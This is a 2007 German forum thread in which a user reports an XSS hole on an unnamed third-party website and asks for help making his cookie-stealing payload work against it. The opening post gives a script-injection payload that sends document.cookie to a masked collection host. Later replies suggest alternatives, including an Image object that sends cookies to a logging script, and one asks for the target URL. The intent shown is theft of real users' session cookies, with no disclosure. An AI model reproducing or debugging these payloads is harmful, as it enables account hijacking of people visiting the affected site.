Problem mit XSS

Dieses Thema im Forum "Sicherheit & Datenschutz" wurde erstellt von Roadkiller, 23. Juni 2007 .

  1. Diese Seite verwendet Cookies. Wenn du dich weiterhin auf dieser Seite aufhältst, akzeptierst du unseren Einsatz von Cookies. Weitere Informationen
  1. #1 23. Juni 2007
    Hi, ich hab eine XSS Lücke in einer etwas größeren Seite gefunden. Die Lücke lässt sich leider nur mit stark modifizierten Javascriptcode ausführen und dahen gibts ein kleines Problem. Der aktuelle Code ist wie folgt:
    Code:
    ';document.write("<img src=http://xxxxxxx/s.php?cookie="+document.cookie+">")//\';document.write("<img src=http://xxxxxxx/s.php?cookie="+document.cookie+">")//";document.write("<img src=http://xxxxxxx/s.php?cookie="+document.cookie+">")//\";document.write("<img src=http://xxxxxxx/s.php?cookie="+document.cookie+">")//--></SCRIPT>">'><SCRIPT>document.write("<img src=http://xxxxxxx/s.php?cookie="+document.cookie+">")</SCRIPT>
    Nur das Problem ist das ich jetzt nur folgenden Inhalt in meiner cookielogdatei bekomme:
    Code:
    \\\" document.cookie \\\"
    Wer mir beim Problem hilft bekommt die Lücke als kleines Dankeschön natürlich auch per PN und eine nette Bewertung von mir und vielleicht auch von Crewmembern.
    MfG Roadkiller
     

  2. Anzeige
    Dealz: stark reduzierte Angebote finden.
  3. #2 23. Juni 2007
    AW: Problem mit XSS

    kommt afaik, weil der server escaped
     
  4. #3 23. Juni 2007
    AW: Problem mit XSS

    alert befehle gehen aber ohne probleme, er kann auch den cookie mit alert(document.cookie) ausgeben
     
  5. #4 23. Juni 2007
    AW: Problem mit XSS

    probiers dochma ohne " und ' :D
    also
    document.write('part1vondeinemimg-code'); (das wird ja richtig geschrieben..
    document.write(document.cookie);
    document.write('der rest " />');
    oder so.. ^^
    oder geht das so nich? :)
     
  6. #5 23. Juni 2007
  7. #6 23. Juni 2007
    AW: Problem mit XSS

    telefonzelle, ne dann geht das überhaupt nicht mehr
     
  8. #7 23. Juni 2007
    AW: Problem mit XSS

    Andere Variante:

    Anstelle von document.write einfach
    n neues Bild machen:

    var img = new Image();
    img.src = 'http://cookie/saver.php?'+document.cookie;

    ?
    :)
     
  9. #8 23. Juni 2007
    AW: Problem mit XSS

    ne das hilft mir auch nicht weiter :(
    Kennt sich den niemand richtig gut mit XSS und Javascript aus?
     
  10. #9 24. Juni 2007
    AW: Problem mit XSS

    Wenn du uns nicht verräts wo die Lücke ist könnten wir(ich) schlecht ausprobieren,
    also post doch url oder schick sie per pn

    mfg

    rushzero
     

  11. Videos zum Thema
Die Seite wird geladen...
Similar Threads - Problem XSS
  1. Antworten:
    6
    Aufrufe:
    5.961
  2. Antworten:
    4
    Aufrufe:
    8.544
  3. Antworten:
    5
    Aufrufe:
    3.806
  4. Antworten:
    0
    Aufrufe:
    4.079
  5. Antworten:
    1
    Aufrufe:
    1.865